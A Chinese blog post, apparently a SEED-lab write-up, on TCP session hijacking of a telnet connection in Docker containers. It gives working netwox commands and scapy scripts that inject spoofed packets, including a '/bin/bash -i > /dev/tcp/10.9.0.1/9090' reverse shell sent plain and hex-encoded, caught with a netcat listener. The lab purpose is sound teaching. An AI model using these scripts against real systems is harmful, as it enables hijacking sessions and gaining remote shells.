分别用netwox和scapy进行TCP 会话劫持攻击,包括注入普通命令和反向shell

最新推荐文章于 2024-01-23 10:38:47 发布
最新推荐文章于 2024-01-23 10:38:47 发布
阅读量1k 收藏 9
点赞数 1
分类专栏: 计算机网络 文章标签: tcp/ip docker linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56222998/article/details/130257981
版权

文章目录

环境搭建

安装实验docker,保存下面的文件为docker-compose.yml:

version: "3"

services:
    attacker:
        image: handsonsecurity/seed-ubuntu:large
        container_name: seed-attacker
        tty: true
        cap_add:
                - ALL
        privileged: true
        volumes:
                - ./volumes:/volumes
        network_mode: host


    Victim:
        image: handsonsecurity/seed-ubuntu:large
        container_name: victim-10.9.0.5
        tty: true
        cap_add:
                - ALL
        privileged: true
        sysctls:
                - net.ipv4.tcp_syncookies=0

        networks:
            net-10.9.0.0:
                ipv4_address: 10.9.0.5

        command: bash -c "
                      /etc/init.d/openbsd-inetd start  &&
                      tail -f /dev/null
                 "
                  
    User1:
        image: handsonsecurity/seed-ubuntu:large
        container_name: user1-10.9.0.6
        tty: true
        cap_add:
                - ALL
        networks:
            net-10.9.0.0:
                ipv4_address: 10.9.0.6

        command: bash -c "
                      /etc/init.d/openbsd-inetd start  &&
                      tail -f /dev/null
                 "

    User2:
        image: handsonsecurity/seed-ubuntu:large
        container_name: user2-10.9.0.7
        tty: true
        cap_add:
                - ALL
        networks:
            net-10.9.0.0:
                ipv4_address: 10.9.0.7

        command: bash -c "
                      /etc/init.d/openbsd-inetd start  &&
                      tail -f /dev/null
                 "

networks:
    net-10.9.0.0:
        name: net-10.9.0.0
        ipam:
            config:
                - subnet: 10.9.0.0/24

然后执行,安装docker镜像

docker-compose -f docker-compose.yml up -d

打开三个终端,其中一个终端为用户机,另两个终端开启docker,执行./run.sh

#run.sh
docker run -it --privileged "handsonsecurity/seed-ubuntu:large" /bin/bash

172.17.0.2为客户端,172.17.0.3为服务器,在服务器上运行./start.sh,开启telnet服务

/etc/init.d/openbsd-inetd restart

使用下面的命令可以查看是否打开了telnet

netstat -a | grep telnet
# tcp        0      0 0.0.0.0:telnet          0.0.0.0:*               LISTEN

docker删除images,先执行docker images查看待删除的镜像的ID,然后执行 docker ps -a,查看有哪些容器正在使用该ID,然后对全部使用镜像ID的容器执行docker rm <container ID>,最后再运行docker rmi <image ID>

攻击机IP:192.168.100.129
用户机IP:172.17.0.2
目标机IP:172.17.0.3

Wireshark截包截图

用wireshark截包最后一个telnet包,获得ack为1026078517,next seq为400319139,这个next seq如果是相对的relative,需要右键协议首选项,将Relative sequence numbers去掉

在这里插入图片描述

利用netwox进行攻击

然后利用netwox伪造数据包,根据TCP序列号原理,新的seqnum为前一个包的ack,acknum为前面的next seq = seq + len,然后在攻击机上运行下面的命令,tcp-data为16进制数,表示abc的ASCII码

sudo netwox 40 --ip4-offsetfrag 0 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 172.17.0.2 --ip4-dst 172.17.0.3 --tcp-src 53010 --tcp-dst 23 --tcp-seqnum 1026078517 --tcp-acknum 400319139 --tcp-ack --tcp-psh --tcp-window 128 --tcp-data "616263"

wireshark成功截下来新发的包,可以看到172.17.0.2向172.17.0.3发送了数据为abc的telnet包,TCP会话劫持攻击成功
在这里插入图片描述

在这里插入图片描述

如果将abc改成命令,例如pwd,则将tcp-data改成70 77 64 0d 0a,表示pwd\r\n,用wireshark抓包就可以看到服务端返回的信息了,/home/seed
在这里插入图片描述

使用scapy进行手动攻击

按照同样的方法填写hijack_manual.py当中的相应参数值,运行python文件后,可以用wireshark抓包
hijack_manual.py代码为:

#!/usr/bin/python3
from scapy.all import *

print("SENDING SESSION HIJACKING PACKET.........")

ip  = IP(src="172.17.0.2", dst="172.17.0.3")
tcp = TCP(sport=53146, dport=23, flags="A", seq=1445493081, ack=3500477510)
data = "\n touch /tmp/myfile.txt\n"
pkt = ip/tcp/data
send(pkt, verbose=0)

在这里插入图片描述

在服务端运行ls /tmp可以看到新建的文件myfile.txt,说明TCP会话劫持成功

在这里插入图片描述

使用scapy进行自动攻击

代码为:

#!/usr/bin/python3
from scapy.all import *

SRC  = "172.17.0.3"
DST  = "172.17.0.2"
PORT = 23

def spoof(pkt):
    old_ip  = pkt[IP]
    old_tcp = pkt[TCP]

    ip = IP(src=DST, dst=SRC)
    tcp = TCP(sport=old_tcp.dport, dport=old_tcp.sport, seq=old_tcp.ack, ack=old_tcp.seq + len(old_tcp.payload), flags="A")
    data = "\n touch /tmp/yzs.txt\n"

    pkt = ip/tcp/data
    send(pkt,verbose=0)
    ls(pkt)
    quit()

f = 'tcp and src host {} and dst host {}'.format(SRC, DST)
sniff(filter=f, prn=spoof,iface='docker0')

用wireshark抓包可以截获这个请求

在这里插入图片描述

使用 TCP 会话劫持创建反向 shell

再打开一个攻击机终端,然后运行netcat -lnvp 9090(右上角) ,另一个先修改好hijack_manual.py相应变量,seq,ack,port,以及发送的数据改成反向shell的命令 /bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1,然后运行hijack_manual.py(左上角),成功发包,然后在运行netcat -lnvp 9090的终端成功反向shell,服务端为左下角

在这里插入图片描述

wireshark抓包可以看到命令 /bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1

在这里插入图片描述

使用netwox,执行命令

netwox 40 --ip4-offsetfrag 0 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 172.17.0.2 --ip4-dst 172.17.0.3 --tcp-src 55474 --tcp-dst 23 --tcp-seqnum 1964894630 --tcp-acknum 3817643431 --tcp-ack --tcp-psh --tcp-window 128 --tcp-data '2f62696e2f62617368202d69203e202f6465762f7463702f31302e392e302e312f3930393020303c263120323e26310a'

左边执行netwox命令,右边执行netcat -lnvp 9090,可以看到wireshark截获了带有反向shell命令的包,并且成功连接上了服务端

在这里插入图片描述

使用scapy自动攻击,代码只需要将上面的字符串改成/bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1即可,左上角为攻击机运行hijack_auto.py文件,右上角可以看到成功进行反shell,wireshark可以看到包

在这里插入图片描述

rebibabo
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Wireshark 网络问题定位与排查企业级实战
悦分享
11-07 6597
让我们具体看一下重传、重复ACK和滑动窗口机制。下面是处理延迟问题的一些注意事项。1. 重传数据包发生重传是因为客户端检测到服务器没有接收到它发送的数据。因此,能否看到重传取决于你在分析通信的哪一端。如果你从服务器那端捕获数据,并且它确实没有接收到客户端发送、重传的数据包,那你将被蒙在鼓里,因为你看不到重传的数据包。如果你怀疑服务器那端受到了数据包丢失的影响,(可能的话)你应该考虑在客户端那边捕获流量以观察是否有重传数据包。2. 重复ACK数据包。
Netwox网络工具使用详解
悦分享
01-03 1398
一个好的辅助工具可以起到事半功倍的效果。netwox是由lauconstantin开发的一款网络工具集,适用群体为网络管理员。它可以创造任意的TCP、UDP和IP数据报文,以实现网络欺骗。它可以在命令模式下使用,也可以在GUI中使用netwag调用。该工具包含了超过200个不同的功能,这里被称为模块。每个模块都有一个特定的编号,使用不同的编号模块来实现不同的功能。netwox工具支持在Linux和Windows系统中运行。
盘点一款黑客必备的强大网络工具集——netwox
pyjishu的博客
04-09 6909
今天给大家分享一个网络工具netwox。 前言 netwox 是由 lauconstantin 开发的一款网络工具集,适用群体为网络管理员和网络黑客,它可以创造任意的 TCP、UDP 和 IP 数据报文,以实现网络欺骗,并且可以在 Linux 和 Windows 系统中运行。 可以说,对平时我们用来测试网络的性能和网站压力测试很有帮助了。它不仅仅只是一个工具包,而是很多个工具集的集中体现,所以,有了它,基本你可以少下载很多软件了。 具体用法 下面就来具体说说它的用法: 首先我们现在netw.
netwox网络工具的使用【网络工程】(保姆级图文)
MZH
06-28 1719
netwox网络工具的使用【网络工程】(保姆级图文)
盘点一款强大的网络工具集:Netwox
最新发布
这家伙很懒,什么都没有留下
01-23 1138
接下来,代码进入一个过滤表达式创建向导,允许用户通过交互方式添加过滤表达式来筛选感兴趣的数据包。在捕获过程中,每当接收到一个数据包时,netwox.packet_callback函数将被调用,对数据包进行处理。在本例中,我们仅将处理函数指定为packet_callback函数,你可以根据自己的需求编写自己的回调函数来处理数据包。在当今数字化的世界中,网络工具集在各行各业都发挥着越来越重要的作用。我们将从其功能、特点、应用场景以及与其他工具的对比等方面进行详细分析,以证明Netwox的强大之处。
netw-ib-ox-ag-5.39.0 Netwox官方原版 网络测试工具
03-19
Netwox是一款强大的网络测试工具,适用于Linux和Windows操作系统,主要功能是帮助网络管理员和IT专业人士进行各种网络诊断和分析任务。Netwox 5.39.0是该工具的官方原版版本,提供了丰富的命令集合,可以执行一系列...
netwox-5.39.0-bin_windows
06-21
netwox-5.39.0-bin_windows 完全可用
TCP SYN Flood分析
02-18
数据包分析,tcp攻击,syn攻击,让你如何分析ddos攻击,让你了解ddos攻击的原理。
TCP协议漏洞利用的问题与解决记录1
08-03
TCP协议漏洞利用的问题与解决记录1 TCP协议漏洞利用的问题与解决记录1是指在计算机网络中,...这篇文章总结了TCP协议漏洞利用的问题与解决记录1,探讨了SYN洪泛攻击的原理和防御机制,并提供了相关命令Scapy脚本。
网络工具netwox.zip
04-19
网络工具netwox.zip
会话劫持安全攻击
allway2的博客
08-02 2307
可以通过对数据包进行加密来防止网络级别的劫持,这样劫持者就无法破译数据包标头,从而获取任何有助于欺骗的信息。TCP会话劫持是对受保护网络上的用户会话的安全攻击会话劫持最常见的方法称为IP欺骗,攻击者使用源路由IP数据包将命令插入网络上两个节点之间的活动通信中,并将自己伪装成经过身份验证的用户之一。在传输模式下,只有数据包中发送的数据被加密,而在隧道模式下,数据包头和数据都被加密,因此限制性更强。另一种类型的会话劫持被称为中间人攻击攻击者使用嗅探器可以观察设备之间的通信并收集传输的数据。...
基于NETWOX软件的TCP/IP协议栈各协议解读——以太帧、IP协议、ARP协议、ICMP协议【未完,待更新】
weixin_53801131的博客
09-27 1285
参考书籍 《从实践中学习 TCP/IP协议》 大学霸IT达人 编著 基于NETWOX软件的TCP/IP协议栈各协议解读TCP/IP协议栈1. 网络概述1.1 TCP/IP协议层次结构1.2 网络工具集netwox2. 网络接口层/网络访问层2.1 网络访问层的构成2.2 网络体系2.2.1 体系的构成2.2.2 类型2.3 物理地址2.3.1 MAC地址格式2.3.2 查询MAC厂商2.3.3 查看网络主机MAC地址信息2.3.4 根据MAC地址获取主机其他信息2.4 以太网2.4.1 以太网连接2.4.
使用netwox实现tcp rst 攻击及防御措施
whoim_i的博客
11-18 4255
目录相关原理(tcp基础)实例演示关于防御措施 相关原理(tcp基础) 三次握手:TCP是基于IP网络层之上的传输层协议,用于端到端的可靠的字节流传输。 过程: 1.C向S发送连接请求,标记位SYN设为1,且随机设置序列号seq 2.S返回确认消息,ACK设为seq+1,标记位SYN设为1,随机序列号seq 3.C返回确认消息,ACK设为seq+1 四次挥手:四次挥手指正常连接中断的情况。 过程:...
网络工具netwox
QHZDWLL的博客
04-19 1129
netwox## 初始 打开netwox539界面 0:退出netwox工具 3:搜索工具(用来搜索与指定信息相关的模块) 4:显示一个工具的帮助(显示指定模块的帮助信息。) 5:在命令行上运行选择参数的工具(在命令行中输入指定模块的参数选项并运行。) 6:从键盘输入指定模块的参数选项并运行。 a:信息、知识、资料(显示信息) b:网络协议(显示网络协议下相关的模块) c:应用协议(显示应用程序协议下的相关的模块) d:嗅、吸(捕获网络数据包)(显示与嗅探数据包相关的模块) e:行骗、哄骗、戏弄(创建和发
netwox使用说明
逗倪豌儿
11-02 1万+
netwox使用说明 netwox可以创建任意的TCP\UDP和IP数据报文,以实现网络欺骗。 1.1. 下载及安装 下载地址: https://sourceforge.net/projects/ntwox/ 在解压的文件夹中找到对应的应用程序文件 installwindows.exe。双击该文件进行安装。 启动netwox,可以看到菜单栏 0:退出 netwox 工具。 3:搜索工具,用来搜索与指定信息相关的模块。 4:显示指定模块的帮助信息。 5:在命令行中输入指定模块的参数选项并运
网络测试工具集 - netwox (可实现网络欺骗)
热门推荐
seaskying的专栏
03-23 2万+
Netwox是一款非常强大和易用的开源工具包,可以创造任意的TCP/UDP/IP数据报文。Netwox工具包中包含了超过200个不同功能的网络报文生成工具,每个工具都拥有一个特定的编号。 Introduction Toolbox netwox helps to find and solve network problems :   - sniff, spoof   - client
利用netwox工具进行局域网内TCP会话劫持和RST攻击,步骤清晰,过程简洁
weixin_43476621的博客
07-24 3775
开启telnet服务 检查是否安装telnet和xinetd rpm -qa telnet-server rpm -qa xinetd 如果没有安装,则先安装 安装命令 yum install telnet-server yum install xinetd 安装完成后,将xinetd服务和telnet服务加入开机自启动 systemctl enable xinetd.service systemctl enable telnet.socket 启动以上两个服务 systemctl start telnet
分别用netwox、scapy、C语言编写的程序进行TCP SYN-Flooding攻击
m0_56222998的博客
04-20 288
使用Linux环境进行TCP Syn-flooding攻击实验
netwox伪造ARP响应【网络工程】(保姆级图文)
MZH
07-12 456
netwox伪造ARP响应【网络工程】(保姆级图文)
Ubuntu安装netwox说命令不存在
05-02
如果你在Ubuntu上安装了netwox,但是在运行netwox命令时出现“命令不存在”的错误信息,可能是因为netwox的安装路径没有添加到系统路径中。 你可以尝试以下两种解决方法: 1. 添加netwox的安装路径到系统路径中 打开终端,输入以下命令: ``` echo 'export PATH="/usr/local/netwox/bin:$PATH"' >> ~/.bashrc ``` 这会将netwox的安装路径添加到系统路径中。然后输入以下命令使修改生效: ``` source ~/.bashrc ``` 现在尝试运行netwox命令,看看是否能够正常工作。 2. 使用netwox的绝对路径 如果你不想将netwox的安装路径添加到系统路径中,可以直接使用netwox的绝对路径来运行它。netwox的默认安装路径为`/usr/local/netwox/bin/netwox`,你可以在终端中输入以下命令来运行它: ``` /usr/local/netwox/bin/netwox ``` 这样就可以直接运行netwox命令了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

rebibabo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值